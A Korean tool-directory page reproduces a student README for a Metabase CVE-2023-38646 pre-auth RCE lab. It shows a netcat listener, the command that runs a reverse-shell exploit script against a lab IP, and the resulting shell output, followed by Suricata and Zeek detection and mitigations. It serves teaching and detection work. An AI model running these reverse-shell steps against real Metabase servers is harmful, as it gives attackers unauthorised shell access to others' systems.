Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Metabase-Pre-Auth-RCE-POC — CVE-2023-38646 | Kitploit
도구/GitHubGitHub/nosrevytsng/metabase-pre-auth-rce-poc
Defensive ToolsVulnerability AnalysisExploitationWeb SecurityPenetration TestingIntrusion DetectionLearning & EducationIncident ResponsePayload Development
GitHubnosrevytsng/metabase-pre-auth-rce-poc

Metabase-Pre-Auth-RCE-POC

CVE-2023-38646

5개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

CVE-2023-38646 — Metabase 원격 코드 실행(RCE) 개념 증명

개요

이 저장소는 CVE-2023-38646을 분석하는 개념 증명(PoC) 보안 연구 프로젝트를 문서화한 것입니다. 이 취약점은 취약한 버전의 Metabase에 영향을 미치는 사전 인증 없이 가능한 원격 코드 실행(RCE) 취약점입니다.

이 프로젝트의 목표는 실제 취약점의 전체 수명 주기를 시연하는 것입니다. 여기에는 다음이 포함됩니다:

  • 취약점 및 근본 원인 이해
  • 통제된 실습 환경에서 익스플로잇 재현
  • 취약한 시스템에 리버스 셸 설정
  • 네트워크 모니터링 도구를 통한 공격 행위 관찰
  • 탐지 엔지니어링 기법 시연
  • 방어적 완화 전략 제안

이 저장소는 다음 분야에서의 실무 역량을 보여주기 위해 설계되었습니다:

  • 취약점 연구
  • 익스플로잇 재현
  • 리버스 셸 사용
  • 네트워크 트래픽 분석
  • 침입 탐지 시스템
  • 보안 완화 전략

취약점 배경

CVE-2023-38646은 오픈 소스 비즈니스 인텔리전스 및 분석 플랫폼인 Metabase의 특정 버전에 영향을 미치는 치명적인 취약점입니다.

이 취약점은 공격자가 애플리케이션의 설정 또는 구성 프로세스의 약점을 악용하여 인증 없이 원격 코드 실행을 달성할 수 있게 합니다.

주요 세부 사항:

  • CVE ID: CVE-2023-38646
  • 심각도: 치명적
  • CVSS 점수: 9.8
  • 공격 벡터: 네트워크
  • 인증 필요 여부: 아니요
  • 영향: 원격 코드 실행(RCE)

성공적인 악용 시 공격자는 다음을 수행할 수 있습니다:

  • 대상 시스템에서 임의 명령 실행
  • 리버스 셸 설정
  • 잠재적으로 전체 시스템 장악

공식 참조:

  • https://nvd.nist.gov/vuln/detail/CVE-2023-38646
  • https://www.metabase.com/

사용된 기술 및 도구

이 프로젝트는 공격적 보안 도구와 방어적 모니터링 도구를 모두 결합합니다.

공격적 보안

  • Python
  • 리버스 셸 페이로드
  • 사용자 정의 익스플로잇 스크립트
  • Metabase 취약한 인스턴스

탐지 및 모니터링

  • Suricata — 침입 탐지 시스템(IDS)
  • Zeek — 네트워크 보안 모니터링(NSM)

방어 기술

  • ModSecurity — 웹 애플리케이션 방화벽
  • OSSEC — 호스트 기반 침입 탐지 시스템

실습 환경

자리 표시자 — 실습 설정 설명

예:

  • 공격자 머신: Kali Linux
  • 대상 머신: 취약한 Metabase 서버
  • 네트워크 모니터링 머신: 보안 모니터링 VM

익스플로잇 PoC

공격 체인 다이어그램

root@kitploit:~
flowchart LR
    A[공격자] --> B[취약한 Metabase 인스턴스]
    B --> C[CVE-2023-38646 익스플로잇]
    C --> D[원격 코드 실행]
    D --> E[리버스 셸 설정됨]
    E --> F[대상에서 명령 실행]

이 다이어그램은 이 프로젝트에서 사용된 높은 수준의 공격 흐름을 보여줍니다.

개념 증명(PoC) 설정

Docker 설치 및 설정:

root@kitploit:~
sudo apt update
sudo apt upgrade -y

sudo apt install docker.io -y

sudo systemctl start docker 
sudo systemctl enable docker

sudo docker run hello-world

Docker 시작:

취약한 Metabase Enterprise 인스턴스(v1.44.0)가 Docker를 사용하여 배포되었습니다.

root@kitploit:~
sudo docker run -d -p 3000:3000 --name metabase-enterprise metabase/metabase-enterprise:v1.44.0

이 명령은 Metabase 웹 인터페이스를 포트 3000에 노출하여 설정 페이지에 접근할 수 있게 합니다.

Docker가 이미 실행 중인 경우, 다음 명령줄을 실행하여 새로 시작하십시오:

root@kitploit:~
sudo docker stop metabase-enterprise
sudo docker rm metabase-enterprise

'Docker 설정' 자리 표시자

컨테이너가 실행되면 Metabase 인터페이스가 브라우저를 통해 접근 가능해집니다.

root@kitploit:~
    http://0.0.0.0:3000/setup -또는- http://127.0.0.1:3000/setup

설정 페이지는 Metabase 인스턴스가 활성 상태이며 구성할 준비가 되었음을 확인합니다.

익스플로잇 시나리오 1

BurpSuite

데모/문서화

자리 표시자: 스크린샷 또는 설명

익스플로잇 시나리오 2 - Python 스크립트 익스플로잇

  1. 리버스 셸 리스너 준비

익스플로잇을 실행하기 전에, 공격자 머신에서 리버스 셸 연결을 받기 위해 Netcat 리스너를 시작합니다.

root@kitploit:~
    nc -lvnp 6666

이 리스너는 익스플로잇된 Metabase 서버로부터의 들어오는 연결을 기다립니다.

자리 표시자: 스크린샷 또는 설명

  1. 익스플로잇 실행 공격자 머신에서 익스플로잇 스크립트를 실행합니다.
root@kitploit:~
    python3 CVE-2023-38646-Reverse-Shell.py \   ---> 익스플로잇 이름
    --rhost http://192.168.1.136:3000 \         ---> 대상 IP 주소
    --lhost 192.168.1.137 \                     ---> 공격자 IP 주소
    --lport 6666                                ---> 공격자 리스닝 포트

페이로드는 공격자 머신으로 리버스 셸을 설정하는 명령을 실행합니다.

  1. 리버스 셸 설정됨 페이로드가 성공적으로 실행되면, 취약한 Metabase 인스턴스가 공격자 머신으로 연결을 시작합니다.

Netcat 리스너가 연결을 수신하여 공격자에게 시스템에 대한 셸 액세스 권한을 부여합니다.

root@kitploit:~
    connect to [192.168.1.137] from 192.168.1.136
    bash: cannot set terminal process group
    bash: no job control in this shell
    bash-5.1$

피해자 장치에 연결되었는지 확인하려면:

root@kitploit:~
    whoami

출력:

root@kitploit:~
    connect to [192.168.1.137] from 192.168.1.136
    bash: cannot set terminal process group
    bash: no job control in this shell
    bash-5.1$ whoami
    whoami
    metabase
    bash-5.1$

탐지 엔지니어링 PoC

이 프로젝트는 또한 네트워크 모니터링 도구를 사용하여 익스플로잇 활동을 탐지하는 방법을 시연합니다.

Suricata 탐지

Suricata(IDS)는 익스플로잇과 관련된 의심스러운 패턴에 대한 네트워크 트래픽을 모니터링하는 데 사용되었습니다.

root@kitploit:~
sudo suricata -i eth0

자리 표시자: Suricata 경고 스크린샷 삽입

root@kitploit:~
evidence/detection/suricata_alert.png

실시간으로 경고를 관찰하기 위해 Suricata 로그를 다음 명령으로 모니터링했습니다:

root@kitploit:~
tail -f /var/log/suricata/fast.log

자리 표시자: Suricata 로그 스크린샷 삽입

root@kitploit:~
evidence/detection/suricata_log.png

수동적인 접근 방식으로, 사용자 정의 알림 스크립트를 사용하여 Suricata가 의심스러운 트래픽을 탐지할 때 데스크톱 알림을 생성했습니다.

root@kitploit:~
nohup ./suricata-popup-alert.sh >/dev/null 2>&1 &

익스플로잇이 실행될 때, Suricata는 Metabase 익스플로잇 시도와 관련된 의심스러운 활동을 나타내는 경고를 생성했습니다.

자리 표시자: Suricata 로그 스크린샷 삽입

root@kitploit:~
evidence/detection/suricata_noti.png

예:

자리 표시자: Suricata 로그 스크린샷 삽입

root@kitploit:~
evidence/detection/suricata_noti.png

Zeek 네트워크 분석

IDS 모니터링 외에도 Zeek를 사용하여 네트워크 트래픽을 분석하고 비정상적인 행동을 식별했습니다.

Zeek는 다음 명령을 사용하여 네트워크 트래픽 캡처 및 분석을 시작하도록 초기화됩니다:

root@kitploit:~
sudo /usr/local/zeek/bin/zeek -i eth0

자리 표시자: Zeek 초기화 스크린샷 삽입

root@kitploit:~
evidence/detection/zeek.png

연결 로그를 검사하면 포트 6666에서의 리버스 셸 트래픽을 관찰할 수 있습니다.

root@kitploit:~
192.168.1.136 → 192.168.1.137:6666

자리 표시자: Zeek 로그 스크린샷 삽입

root@kitploit:~
evidence/detection/zeek_log.png

완화 및 방어 전략

여러 완화 전략을 통해 익스플로잇 위험을 줄일 수 있습니다.

전략설명
패치 관리CVE-2023-38646을 패치한 Metabase 버전으로 업그레이드
웹 애플리케이션 방화벽 (ModSecurity)악성 HTTP 요청 필터링
호스트 침입 탐지 (OSSEC)의심스러운 시스템 행동 모니터링
네트워크 모니터링 (Suricata 및 Zeek)비정상적인 트래픽 패턴 탐지

저장소 구조

root@kitploit:~
cve-2023-38646-metabase-rce-research
│
├── exploit
│   └── metabase_reverse_shell.py
│
├── detection
│   ├── suricata
│   └── zeek
│
├── evidence
│   ├── exploitation
│   ├── detection
│   └── mitigation
│
├── docs
│   ├── report
│   └── presentation
│
└── demo

요약

이 프로젝트는 실제 치명적인 취약점을 분석하고 재현하는 전체 수명 주기를 보여줍니다.

PoC는 다음을 보여줍니다:

  • 취약점 분석
  • 익스플로잇 재현
  • 리버스 셸 실행
  • 네트워크 트래픽 모니터링
  • 침입 탐지
  • 방어적 완화 전략

이 저장소의 목표는 공격적 및 방어적 사이버 보안 관행을 모두 보여주는 기술 사례 연구를 제공하는 것입니다.


🖋️ 작성자

Styverson Ng

정보기술 학사
인공지능 및 자율 시스템
사이버 보안 및 사이버 포렌식

Murdoch University

도구 다운로드